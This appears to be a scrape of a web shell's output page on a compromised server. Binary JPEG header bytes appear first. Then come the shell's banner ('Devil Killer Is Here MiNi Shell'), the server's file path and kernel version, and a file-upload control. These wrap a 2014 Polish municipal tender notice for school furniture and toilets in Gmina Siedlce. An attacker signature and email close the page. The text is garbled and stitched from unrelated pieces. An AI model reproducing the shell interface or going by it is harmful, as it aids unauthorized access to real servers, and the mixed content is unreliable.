JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140626/213702-N-2014.html

<p class="kh_header"><b>Siedlce: Zakup i montaż mebli do Zespołów Oświatowych w: Golicach, Nowych Iganiach, Stoku Lackim, Strzale, Pruszynie i Żelkowie - Kolonii oraz dostosowanie toalet poprzez zakup i montaż urządzeń sanitarnych do Zespołów Oświatowych w:  Nowych Iganiach, Stoku Lackim i Golicach</b><br>
<b>Numer ogłoszenia: 213702 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siedlce , ul. Asłanowicza 10, 08-110 Siedlce, woj. mazowieckie, tel. 25 633 25 40 wew. 56, faks 25 6323630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminasiedlce.pl oraz http://e-bip.pl/Start/26.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i montaż mebli do Zespołów Oświatowych w: Golicach, Nowych Iganiach, Stoku Lackim, Strzale, Pruszynie i Żelkowie - Kolonii oraz dostosowanie toalet poprzez zakup i montaż urządzeń sanitarnych do Zespołów Oświatowych w:  Nowych Iganiach, Stoku Lackim i Golicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zakup i montaż mebli do Zespołów Oświatowych w: Golicach, Nowych Iganiach, Stoku Lackim, Strzale, Pruszynie i Żelkowie - Kolonii oraz dostosowanie toalet poprzez zakup i montaż urządzeń sanitarnych do Zespołów Oświatowych w:  Nowych Iganiach, Stoku Lackim i Golicach
Należy dostarczyć  i zamontować w Zespole Oświatowym w  Golicach: 
Miska ustępowa ze spłuczką szt.	2
Należy dostarczyć  i zamontować w Zespole Oświatowym w  Stoku Lackim:
Umywalka szt.	6
Miska ustępowa stojąca ze spłuczką szt.		6
Nakładki zmniejszające obwód ustępu szt.		6
Podesty do toalet i umywalek szt.		6
Półki na kubeczki szt.		6
Lustra szt.		3
Dozownik na mydło w płynie 0.5l	 szt.	6
Dozownik na ręczniki papierowe szt.		6
Należy dostarczyć  i zamontować w Zespole Oświatowym w  Nowych Iganiach:
Półeczka na kubeczki z 5 podwójnymi haczykami i miejscem na 10 kubeczków.szt.	6
Lustro wym. 60 x 60 cm. szt.		3
Dozownik mydła w płynie 0.5l szt.		4
Dozownik na ręczniki papierowe w listkach poj. 500 szt. 	4
Umywalka biała 60 cm + syfon szt.		4
Bateria umywalkowa	 szt.	4
Miska ustępowa ze spłuczką i deską sedesową szt.		3
Podgrzewacz wody elektryczny, 30 l.,	szt.	 3
Miska ustępowa ze spłuczką i deską sedesową szt.		1
Dozownik na mydło	szt.	 1
Dozownik ręczników poj. 400 szt. 	szt.	1
Należy dostarczyć  i zamontować w Zespole Oświatowym w  Golicach:
Szafka z półkami szt.	1
Szafka z szufladami	szt.	2
Należy dostarczyć i zamontować w Zespole Oświatowym w Stoku Lackim:
Blat do stołu z zielonym obrzeżem szt.		10
Stelaż do blatu rozmiar 2 (nogi) szt.		6
Stelaż do blatu rozmiar 3 (nogi)	 szt.	4
Krzesło typu T z regulacją wysokości 1-2 - żółty - buk	szt.	 36
Krzesło typu T z regulacją wysokości 3-4 - żółty - buk szt.		24
Zestaw mebli  żółty- szafki ze schowkami szt.		3
Szafka na prace	 szt.	 3
Szafka  z przesuwanymi drzwiami żółta szt.		3
Szafa wysoka  z drzwiczkami żółta	 szt.	3
Biurko  żółte	szt.	 3
Krzesło konferencyjne czarno-beżowe.	szt.	 3
Biblioteczka stojąca zielona szt.		3
Pufy zielone do biblioteczki stojącej, zielonej	 szt.	3
Dywan typu żabka z figurami 2 x 3 m	szt.	3
Tablica suchościeralna  100 x 170 cm szt.		3
Szafka typu Jeż szt.		3
Rolety okienne szt.		3
Pufa typu piesek	 szt.	6
Pufa typu tygrys	 szt.	6
Pufa typu biedronka szt.		6
Pufa typu baranek szt.		6
Pufa typu żółw	szt.	6
Pufa typu kotek	szt.	6
Gruszka mała czerwona	szt.	3
Gruszka mała fioletowa	szt.	3
Poducha sensoryczna myszka szt.		3
Kanapa typu śpiący miś	szt.	6
Materac narożny typu serce	 szt.	3
Poducha typu rybka	szt.	4
Poducha typu myszka	 szt.	4
Poduszka zielona	szt.	3
Poduszka czerwona	szt.	3
Poduszka chabrowa	szt.	3
Poduszka pomarańczowa	szt.	3
Bajkowe materace 3 częściowe szt.		3
Kanapa rozkładana	szt.	3
Poduszki okrągłe 	szt.	5
Szatnia  zamykana drzwiczkami	szt.	11
Szafa ubraniowa	 szt.	3
Naklejki na szatnię	szt.	11
Gaśnica 4kg ABC szt.		3
Oznaczenia ewakuacyjne	szt.	2
Apteczka z wyposażeniem, metalowa, na ścianę szt.		3
Zabezpieczenia gniazdek elektrycznych szt.		3
Zabezpieczenia kątowe mebli.szt.		9
Instrukcja udzielania pierwszej pomocy szt.		3
Szafka medyczna szt.		3
Należy dostarczyć  i zamontować w Zespole Oświatowym w  Nowych Iganiach:
wózek dwuwiadrowy 2 x 17 l. z koszykiem i uchwytem na worki	szt.	2
mop do powierzchni suchych	szt.	2
wózek z mopem na kółkach	szt.	2
kosz na śmieci plastik, ruchoma pokrywa, 50 l. 	szt.	2
Kosz na śmieci, stal nierdzewna 20 l.szt.	3
elementy dekoracyjne na ścianę z tektury - łąka	szt.	4
zestaw z motylkiem - dekoracja na ścianę - 3 elementy z tektury	szt.	5
zestaw z chmurką - dekoracja na ścianę - 3 elementy z tektury	szt.	4
Metalowa szafa gospodarcza	szt.	1
stojaki do 12 krzeseł rozmiar 6 szt.	2
Krzesła dla rodziców do szatni  składane rozmiar 6, można je przechowywać na stojakach	szt.	24
szafa z 10 schowkami zamykana na zamek	szt.	1
rolety   - zestaw do dwóch sal lekcyjnych	szt.	1
kalendarz na wszystkie pory roku	 szt.	2
duże naklejki - kwiaty	szt.	6
border kwiaty - na ścianę samoprzylepne naklejki szt.	5
ścianka dekoracyjno - fakturowa kotek na płotku - lakierowana sklejka 145 x 104 cm	szt.	1
Pojemnik na kółkach - różne kolory	szt.	6
Pojemnik - skrzynia poj. 55 l. szt.	6
Dywan - figury geometryczne 2 x 2	szt.	2
Dywan biedronki z okrągłymi ruchomymi elementami z cyframi szt.2
suszarka metalowa (25 poziomów) na prace do suszenia formatu A3 lub 50 A 4	szt.	3
szafka plastyczna  94,2 x 45 x 90 cm	szt.	3
Szafka czterodrzwiowa zamykana na kluczyki (76 x 40 x 152 cm)	szt.	3
Zestaw mebli z frontami brzozowymi z trójwymiarowymi motywami w kształcie misiów. Dł. zestawu 3,90 m	 szt.	1
Zestaw mebli z płyt w tonacji brzozy, z aplikacjami w kształcie kwiatów i owadów występujących na łące. Dł. zestawu 3,45 m	szt.	1
Zestaw mebli z kolorowymi szafkami	szt.	1
Aplikacja z chłopcem i dziewczynką do tablicy korkowej 100 x 200 cm	szt.	1
Aplikacja ze śpiącym smokiem do tablicy korkowej 100 x 200 cm szt.	1
Stół kwadratowy z kolorowym obrzeżem i regulowanymi nogami - buk	szt.	5
krzesło rozmiar 3 z metalowymi nogami	szt.	20
Tablica korkowa  w drewnianej ramie 100 x 200 cm szt.	2
pufy (zwierzątka) z bawełnianym pokrowcem 	szt.	10
Parasole ogrodowe	szt.	2
poducha myszka 	szt.	5
poducha rybka	szt.	 5
Bujak z tkaniny PCV ślimak szt.	 	3
Bujak foczka z tkaniny PCV szt.	 	2
Bujak konik z tkaniny PCV szt.		1
Kształtki - smok, na rzepy	szt.		2
Poduszki okrągłe 10 szt. w zestawie,szt.	 	2
Stojak na poduszki okrągłe o średnicy 35 cm szt.		2
Materace 3 - częściowe z ruchomymi łapkami i uszami szt.		3
Należy dostarczyć  i zamontować w Zespole Oświatowym w Pruszynie:
Mop do powierzchni suchych	szt.	1
Wózek z mopem na kółkach	szt.1	
Stół kwadratowy  szt.		4
Krzesło z metalowymi nogami szt.		18
Wykładzina dywanowa szt.		1
Biurko dla nauczyciela z szufladkami i z szafką szt.		1
Zestaw mebli przedszkolnych szt.	1
Szafka  170/80/38 z 8 zamykanymi szafeczkami szt.2
Szafka wykończeniowa - półeczki 100/54/38 szt.1
Szafka dwudrzwiowa 100/80/38 szt.1
Szafka z półkami - 100/80/36 szt.1
Szafka z drzwiczkami i półeczkami  100/80/36 szt.1
Szafka z szufladami 100/106/38 szt.1
Szafka na instrumenty muzyczne szt.1
Pufy - zestaw	szt.2   
Należy dostarczyć  i zamontować w Zespole Oświatowym w Strzale:
stół prostokątny nr 3 szt.	2
stół prostokątny nr 4	szt.3
krzesełka dziecięce nr 3 szt.	12
krzesełka dziecięce nr 4 szt.	18
szafki szt.	5
biurko szt.	1
krzesło obrotowe	szt. 1
tablica tryptyk szt.	1
tablica korkowa	szt. 2
wykładzina dywanowa	 szt. 1
wykładzina dywanowa	 szt.1
pufa żaba	szt. 1
pufa z oparciem	 szt. 3
pufa bez oparcia	 szt.3
piankowe klocki modułowe morskie fale szt.	3
materac składany trójdzielny	szt. 8
meble do wyposażenia szatni	szt. 10
apteczka pierwszej pomocy do sali lekcyjnej szt. 	1
apteczka z kompletnym wyposażeniem przenośna szt.	2
gaśnica przeciwpożarowa 4 kg ABC 	szt. 1
znaki ewakuacyjne szt.	5
instrukcje BHP ogólne	 szt. 3
instrukcje medyczne	szt. 3
Należy dostarczyć  i zamontować w Zespole Oświatowym w Żelkowie-Kolonii:
stół  prostokątny brzoza z regulacją wysokości  nóg 	szt.3
krzesełko drewniane 	szt.12
Krzesełko drewniane szt. 	6
Regał otwarty na zabawki, szafki ze schowkami, kolekcja bajkowa szt.	1
Duża szafa zamykana do zestawu z kolekcji bajkowej	szt.1
Biurko dla nauczyciela z bajkowej serii. szt.	1
Krzesło wysokie do biurka nauczyciela szt.	2
tablica szkolna korkowa	szt.2
kolorowa wykładzina dywanowa	szt. 2
rolety okienne szt.	2
poduszki okrągłe szt.	3
pufa - gruszka mała czerwona szt.	2
pufa - gruszka mała  zielona szt.	2
Szafki na ubrania -  szatnia.szt.	3
metalowa szafa gospodarcza szt.	1
Gaśnica przeciwpożarowa szt.	2
Oznaczenia ewakuacyjne 	2 komp.
Apteczka z kompletnym wyposażeniem szt.	2
Zabezpieczenia gniazdek elektrycznych	szt.4
Zabezpieczenie kątowe mebli szt.	4
Skrzynka na klucz ewakuacyjny szt.	2
Szafka medyczna ze stali nierdzewnej	 szt. 2
Instrukcja udzielania pierwszej pomocy	szt.2
szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ oraz w załączniku nr 1 do umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.41.10.00-4, 39.29.93.00-7, 39.13.00.00-2, 39.16.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 3.500,00 zł (słownie: trzy tysiące pięćset złotych). Wadium może być wnoszone w formach wymienionych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Wadium musi obejmować okres związania ofertą, tj. 30 dni.
Termin wniesienia wadium upływa dnia 07.07.2014 r. o godz. 9:30
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Bank BPH S. A., Oddział w Siedlcach, ul. Starowiejska 6, 
nr 39106000760000331000193435, Urząd Gminy Siedlce z dopiskiem: Zakup i montaż mebli do Zespołów Oświatowych w: Golicach, Nowych Iganiach, Stoku Lackim, Strzale, Pruszynie i Żelkowie - Kolonii oraz dostosowanie toalet poprzez zakup i montaż urządzeń sanitarnych do Zespołów Oświatowych w:  Nowych Iganiach, Stoku Lackim i Golicach.
Wadium wnoszone w pieniądzu zamawiający przechowuje na rachunku bankowym. Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajdzie się 
na rachunku bankowym Zamawiającego.
Wadium wnoszone w innej formie jak pieniądze Wykonawca składa w oryginale wraz 
z ofertą w oddzielnej kopercie. Nie należy oryginału dokumentu wadialnego trwale łączyć z ofertą. 
Gwarancje ubezpieczeniowe lub gwarancje bankowe oraz poręczenia złożone jako zabezpieczenie wadium muszą posiadać okres ważności nie krótszy niż okres związania ofertą, (pod rygorem wykluczenia Wykonawcy z postępowania) oraz umożliwiać Zamawiającemu otrzymanie określonej kwoty wadium bez jakichkolwiek warunków wstępnych i na jego pierwsze wezwanie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostawy o wartości 50.000,00 zł brutto każda związana z przedmiotem zamówienia (dostawą mebli) wraz  z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodu, określającego czy dostawy  zostały wykonane w sposób należyty oraz wskazującego czy zostały wykonane lub są wykonywane należycie. Przez dowody należy rozumieć:
a) poświadczenie, 
b)  inny dokument, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostawy o wartości 50.000,00 zł brutto każda związana z przedmiotem zamówienia (dostawą mebli) wraz  z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodu, określającego czy dostawy  zostały wykonane w sposób należyty oraz wskazującego czy zostały wykonane lub są wykonywane należycie. Przez dowody należy rozumieć:
a) poświadczenie, 
b)  inny dokument, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać następujące dokumenty:
1) Wypełniony i podpisany formularz oferty z podaniem ceny brutto przedmiotu przetargu - załącznik nr 1 do oferty.
2) Dokumenty do oceny wiarygodności wymienione w pkt. 5 i 6
3) Wypełnione załączniki nr 2, 3, 4,5 do oferty.
4) Wypełniony i podpisany projekt umowy - załącznik nr 6 do oferty wraz z załącznikiem cenowym
5) Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik.
6) Dokument potwierdzający wniesienie wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminasiedlce.pl oraz http://e-bip.pl/Start/26.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siedlce ul. Asłanowicza 10, 08-110 Siedlce pokój nr 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 09:30, miejsce: Urząd Gminy Siedlce ul. Asłanowicza 10, 08-110 Siedlce pokój nr 10 (sekretraiat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia będzie finansowany z budżetu Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1. Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com